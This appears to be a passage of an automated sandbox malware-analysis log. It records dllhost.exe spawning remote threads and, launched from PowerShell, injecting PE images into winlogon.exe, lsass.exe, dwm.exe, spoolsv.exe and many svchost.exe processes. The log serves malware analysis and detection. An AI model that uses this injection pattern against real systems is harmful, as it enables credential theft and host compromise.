Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 20F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 58952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ADFC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CB62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E1072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 97FD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 652E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A27C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 87DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 28E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB3C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5672EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C1F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E3BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 38952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1FF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 79572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E502EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13112EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AEC92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: DC1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 82532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: A62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 66EB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FD9A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CEDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 42792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B6F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8DCD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 73832EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F9DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CCC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 39D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA392EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B7272EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53B52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E88A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 77B52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B5E12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53C22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 913B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 41D42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ADAD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F96A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9852EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C5282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 76AA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CBA02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F34B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE4D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 74472EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A9D02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF8C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43DC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 97E32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC872EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E812EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C08C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 34C52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 58922EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B4702EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8A42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3D425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3F3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 87882EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 20F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 28E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ED25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 913B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F96A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CBA02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D1EA2EBC

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CD30000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5E060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
